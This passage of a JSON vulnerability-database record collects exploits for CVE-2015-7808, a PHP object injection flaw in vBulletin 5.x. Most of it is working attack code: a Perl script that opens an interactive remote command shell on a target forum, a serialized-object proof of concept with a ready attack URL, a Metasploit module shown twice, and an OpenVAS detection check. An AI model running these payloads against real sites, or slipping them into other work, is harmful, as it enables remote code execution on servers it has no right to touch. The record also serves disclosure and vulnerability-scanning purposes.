Webapps exploit for php platform", "published": "2015-11-23T00:00:00", "type": "exploitdb", "title": "vBulletin 5.x - Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-7808"], "modified": "2015-11-23T00:00:00", "id": "EDB-ID:38790", "href": "https://www.exploit-db.com/exploits/38790/", "sourceData": "#[+] Title: Vbulletin 5.x - Remote Code Execution Exploit\r\n#[+] Product: vbulletin\r\n#[+] Vendor: http://vbulletin.com\r\n#[+] Vulnerable Version(s): Vbulletin 5.x\r\n#\r\n#\r\n# Author : Mohammad Reza Espargham\r\n# Linkedin : https://ir.linkedin.com/in/rezasp\r\n# E-Mail : me[at]reza[dot]es , reza.espargham[at]gmail[dot]com\r\n# Website : www.reza.es\r\n# Twitter : https://twitter.com/rezesp\r\n# FaceBook : https://www.facebook.com/reza.espargham\r\n# Special Thanks : Mohammad Emad\r\n\r\nsystem(($^O eq 'MSWin32') ? 'cls' : 'clear');\r\n\r\nuse LWP::UserAgent;\r\nuse LWP::Simple;\r\n$ua = LWP::UserAgent ->new;\r\n\r\nprint \"\\n\\t Enter Target [ Example:http://target.com/forum/ ]\";\r\nprint \"\\n\\n \\t Enter Target : \";\r\n$Target=<STDIN>;\r\nchomp($Target);\r\n\r\n\r\n$response=$ua->get($Target . '/ajax/api/hook/decodeArguments?arguments=O:12:\"vB_dB_Result\":2:{s:5:\"%00*%00db\";O:11:\"vB_Database\":1:{s:9:\"functions\";a:1:{s:11:\"free_result\";s:6:\"system\";}}s:12:\"%00*%00recordset\";s:20:\"echo%20$((0xfee10000))\";}');\r\n\r\n$source=$response->decoded_content;\r\nif (($source =~ m/4276158464/i))\r\n{\r\n $response=$ua->get($Target . 
'/ajax/api/hook/decodeArguments?arguments=O:12:\"vB_dB_Result\":2:{s:5:\"%00*%00db\";O:11:\"vB_Database\":1:{s:9:\"functions\";a:1:{s:11:\"free_result\";s:6:\"system\";}}s:12:\"%00*%00recordset\";s:6:\"whoami\";}');\r\n $user=$response->decoded_content;\r\n chomp($user);\r\n print \"\\n Target Vulnerable ;)\\n\";\r\n while($cmd==\"exit\")\r\n {\r\n print \"\\n\\n$user\\$ \";\r\n $cmd=<STDIN>;\r\n chomp($cmd);\r\n if($cmd =~ m/exit/i){exit 0;}\r\n $len=length($cmd);\r\n $response=$ua->get($Target . '/ajax/api/hook/decodeArguments?arguments=O:12:\"vB_dB_Result\":2:{s:5:\"%00*%00db\";O:11:\"vB_Database\":1:{s:9:\"functions\";a:1:{s:11:\"free_result\";s:6:\"system\";}}s:12:\"%00*%00recordset\";s:'.$len.':\"'.$cmd.'\";}');\r\n print \"\\n\".$response->decoded_content;\r\n\r\n }\r\n}else{print \"\\ntarget is not Vulnerable\\n\\n\"}", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/38790/"}, {"lastseen": "2016-02-04T08:31:27", "description": "vBulletin 5.1.x - PreAuth 0day Remote Code Execution Exploit. 
Webapps exploit for php platform", "published": "2015-11-05T00:00:00", "type": "exploitdb", "title": "vBulletin 5.1.x - PreAuth 0day Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-7808"], "modified": "2015-11-05T00:00:00", "id": "EDB-ID:38629", "href": "https://www.exploit-db.com/exploits/38629/", "sourceData": "# Exploit Title: Vbulletin 5.1.X unserialize 0day preauth RCE exploit\r\n# Date: Nov 4th, 2015\r\n# Exploit Author: hhjj\r\n# Vendor Homepage: http://www.vbulletin.com/\r\n# Version: 5.1.x\r\n# Tested on: Debian\r\n# CVE : \r\n# I did not discover this exploit, leaked from the IoT.\r\n\r\n# Build the object\r\nphp << 'eof'\r\n<?php\r\nclass vB_Database {\r\n public $functions = array();\r\n\r\n public function __construct() \r\n {\r\n $this->functions['free_result'] = 'phpinfo';\r\n }\r\n}\r\n\r\nclass vB_dB_Result {\r\n protected $db;\r\n protected $recordset;\r\n\r\n public function __construct()\r\n {\r\n $this->db = new vB_Database();\r\n $this->recordset = 1;\r\n }\r\n}\r\n\r\nprint urlencode(serialize(new vB_dB_Result())) . 
\"\\n\";\r\neof\r\nO%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bi%3A1%3B%7D\r\n\r\n#Then hit decodeArguments with your payload :\r\nhttp://localhost/vbforum/ajax/api/hook/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2a%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2a%00recordset%22%3Bi%3A1%3B%7D\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/38629/"}, {"lastseen": "2020-08-21T19:05:10", "description": "", "published": "2017-07-24T00:00:00", "type": "exploitdb", "title": "vBulletin 5.1.2 < 5.1.9 - Unserialize Code Execution (Metasploit)", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-7808"], "modified": "2017-07-24T00:00:00", "id": "EDB-ID:48761", "href": "https://www.exploit-db.com/exploits/48761", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'vBulletin 5.1.2 Unserialize Code Execution',\r\n 'Description' => %q{\r\n This module exploits a PHP object injection vulnerability in vBulletin 5.1.2 to 5.1.9\r\n },\r\n 'Platform' => 'php',\r\n 'License' => MSF_LICENSE,\r\n 'Author' => [\r\n 'Netanel Rubin', # reported by\r\n 'cutz', # original exploit\r\n 'Julien (jvoisin) Voisin', # metasploit module\r\n ],\r\n 'Payload' =>\r\n {\r\n 'BadChars' => \"\\x22\",\r\n },\r\n 'References' =>\r\n [\r\n ['CVE', '2015-7808'],\r\n 
['EDB', '38629'],\r\n ['URL', 'http://pastie.org/pastes/10527766/text?key=wq1hgkcj4afb9ipqzllsq'],\r\n ['URL', 'http://blog.checkpoint.com/2015/11/05/check-point-discovers-critical-vbulletin-0-day/']\r\n ],\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' => [\r\n [ 'Automatic Targeting', { 'auto' => true } ],\r\n ['vBulletin 5.0.X', {'chain' => 'vB_Database'}],\r\n ['vBulletin 5.1.X', {'chain' => 'vB_Database_MySQLi'}],\r\n ],\r\n 'DisclosureDate' => 'Nov 4 2015',\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [ true, \"The base path to the web application\", \"/\"])\r\n ])\r\n end\r\n\r\n def check\r\n begin\r\n res = send_request_cgi({ 'uri' => target_uri.path })\r\n if (res && res.body.include?('vBulletin Solutions, Inc.'))\r\n if res.body.include?(\"Version 5.0\")\r\n @my_target = targets[1] if target['auto']\r\n return Exploit::CheckCode::Appears\r\n elsif res.body.include?(\"Version 5.1\")\r\n @my_target = targets[2] if target['auto']\r\n return Exploit::CheckCode::Appears\r\n else\r\n return Exploit::CheckCode::Detected\r\n end\r\n end\r\n rescue ::Rex::ConnectionError\r\n return Exploit::CheckCode::Safe\r\n end\r\n end\r\n\r\n def exploit\r\n print_status(\"Trying to inferprint the instance...\")\r\n\r\n @my_target = target\r\n check_code = check\r\n\r\n unless check_code == Exploit::CheckCode::Detected || check_code == Exploit::CheckCode::Appears\r\n fail_with(Failure::NoTarget, \"#{peer} - Failed to detect a vulnerable instance\")\r\n end\r\n\r\n if @my_target.nil? 
|| @my_target['auto']\r\n fail_with(Failure::NoTarget, \"#{peer} - Failed to auto detect, try setting a manual target...\")\r\n end\r\n\r\n print_status(\"Exploiting #{@my_target.name}...\")\r\n\r\n chain = 'O:12:\"vB_dB_Result\":2:{s:5:\"*db\";O:'\r\n chain << @my_target[\"chain\"].length.to_s\r\n chain << ':\"'\r\n chain << @my_target[\"chain\"]\r\n chain << '\":1:{s:9:\"functions\";a:1:{s:11:\"free_result\";s:6:\"assert\";}}s:12:\"*recordset\";s:'\r\n chain << \"#{payload.encoded.length}:\\\"#{payload.encoded}\\\";}\"\r\n\r\n chain = Rex::Text.uri_encode(chain)\r\n chain = chain.gsub(/%2a/, '%00%2a%00') # php and Rex disagree on '*' encoding\r\n\r\n send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path, 'ajax/api/hook/decodeArguments'),\r\n 'vars_get' => {\r\n 'arguments' => chain\r\n },\r\n 'encode_params' => false,\r\n })\r\n end\r\nend", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://www.exploit-db.com/download/48761"}], "metasploit": [{"lastseen": "2020-10-07T21:45:55", "description": "This module exploits a PHP object injection vulnerability in vBulletin 5.1.2 to 5.1.9\n", "published": "2015-11-12T20:36:01", "type": "metasploit", "title": "vBulletin 5.1.2 Unserialize Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-7808"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/MULTI/HTTP/VBULLETIN_UNSERIALIZE", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'vBulletin 5.1.2 Unserialize Code Execution',\n 'Description' => %q{\n This module exploits a PHP object injection vulnerability in vBulletin 5.1.2 to 5.1.9\n },\n 'Platform' => 'php',\n 'License' => 
MSF_LICENSE,\n 'Author' => [\n 'Netanel Rubin', # reported by\n 'cutz', # original exploit\n 'Julien (jvoisin) Voisin', # metasploit module\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x22\",\n },\n 'References' =>\n [\n ['CVE', '2015-7808'],\n ['EDB', '38629'],\n ['URL', 'http://pastie.org/pastes/10527766/text?key=wq1hgkcj4afb9ipqzllsq'],\n ['URL', 'http://blog.checkpoint.com/2015/11/05/check-point-discovers-critical-vbulletin-0-day/']\n ],\n 'Arch' => ARCH_PHP,\n 'Targets' => [\n [ 'Automatic Targeting', { 'auto' => true } ],\n ['vBulletin 5.0.X', {'chain' => 'vB_Database'}],\n ['vBulletin 5.1.X', {'chain' => 'vB_Database_MySQLi'}],\n ],\n 'DisclosureDate' => '2015-11-04',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [ true, \"The base path to the web application\", \"/\"])\n ])\n end\n\n def check\n begin\n res = send_request_cgi({ 'uri' => target_uri.path })\n if (res && res.body.include?('vBulletin Solutions, Inc.'))\n if res.body.include?(\"Version 5.0\")\n @my_target = targets[1] if target['auto']\n return Exploit::CheckCode::Appears\n elsif res.body.include?(\"Version 5.1\")\n @my_target = targets[2] if target['auto']\n return Exploit::CheckCode::Appears\n else\n return Exploit::CheckCode::Detected\n end\n end\n rescue ::Rex::ConnectionError\n return Exploit::CheckCode::Safe\n end\n end\n\n def exploit\n print_status(\"Trying to inferprint the instance...\")\n\n @my_target = target\n check_code = check\n\n unless check_code == Exploit::CheckCode::Detected || check_code == Exploit::CheckCode::Appears\n fail_with(Failure::NoTarget, \"#{peer} - Failed to detect a vulnerable instance\")\n end\n\n if @my_target.nil? 
|| @my_target['auto']\n fail_with(Failure::NoTarget, \"#{peer} - Failed to auto detect, try setting a manual target...\")\n end\n\n print_status(\"Exploiting #{@my_target.name}...\")\n\n chain = 'O:12:\"vB_dB_Result\":2:{s:5:\"*db\";O:'\n chain << @my_target[\"chain\"].length.to_s\n chain << ':\"'\n chain << @my_target[\"chain\"]\n chain << '\":1:{s:9:\"functions\";a:1:{s:11:\"free_result\";s:6:\"assert\";}}s:12:\"*recordset\";s:'\n chain << \"#{payload.encoded.length}:\\\"#{payload.encoded}\\\";}\"\n\n chain = Rex::Text.uri_encode(chain)\n chain = chain.gsub(/%2a/, '%00%2a%00') # php and Rex disagree on '*' encoding\n\n send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'ajax/api/hook/decodeArguments'),\n 'vars_get' => {\n 'arguments' => chain\n },\n 'encode_params' => false,\n })\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/vbulletin_unserialize.rb"}], "openvas": [{"lastseen": "2020-05-12T17:24:59", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-7808"], "description": "vBulletin is prone to a remote code-injection vulnerability because it fails to properly sanitize user-supplied input.", "modified": "2020-05-08T00:00:00", "published": "2015-11-10T00:00:00", "id": "OPENVAS:1361412562310105447", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105447", "type": "openvas", "title": "vBulletin PreAuth Remote Code Execution", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# vBulletin PreAuth Remote Code Execution\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software 
Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:vbulletin:vbulletin\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105447\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_cve_id(\"CVE-2015-7808\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-11-10 18:30:30 +0100 (Tue, 10 Nov 2015)\");\n script_name(\"vBulletin PreAuth Remote Code Execution\");\n script_category(ACT_ATTACK);\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_dependencies(\"vbulletin_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"vbulletin/detected\");\n\n script_xref(name:\"URL\", value:\"http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/4332166-security-patch-release-for-vbulletin-5-connect-versions-5-1-4-through-5-1-9\");\n\n script_tag(name:\"impact\", value:\"An attacker can exploit this vulnerability to inject and execute arbitrary code within the context of the affected application.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a special crafted HTTP GET request and check the response.\");\n\n 
script_tag(name:\"solution\", value:\"Vendor has released security patches.\");\n\n script_tag(name:\"summary\", value:\"vBulletin is prone to a remote code-injection vulnerability because it fails to properly sanitize user-supplied input.\");\n\n script_tag(name:\"affected\", value:\"vBulletin 5.1.4, 5.1.5, 5.1.6, 5.1.7, 5.1.8 and 5.1.9.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_active\");\n\n exit(0);\n}\n\ninclude(\"url_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! dir = get_app_location( cpe:CPE, port:port ) ) exit( 0 );\n\nif( dir == \"/\" ) dir = \"\";\n\nforeach db( make_list( \"vB_Database_MySQLi\", \"vB_Database\" ) ) {\n\n db_len = strlen( db );\n cmd = 'phpinfo';\n cmd_len = strlen( cmd );\n\n exp = 'O:12:\"vB_dB_Result\":2:{s:5:\"*db\";O:' + db_len + ':\"' + db + '\":1:{s:9:\"functions\";a:1:{s:11:\"free_result\";s:' + cmd_len + ':\"' + cmd + '\";}}s:12:\"*recordset\";i:1;}';\n\n exp = urlencode( str:exp );\n exp = str_replace( string:exp, find:'*', replace:'%00%2a%00' );\n\n url = dir + '/ajax/api/hook/decodeArguments?arguments=' + exp;\n\n if( http_vuln_check( port:port, url:url, pattern:'<title>phpinfo\\\\(\\\\)</title>' ) ) {\n report = http_report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nexit( 99 );\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}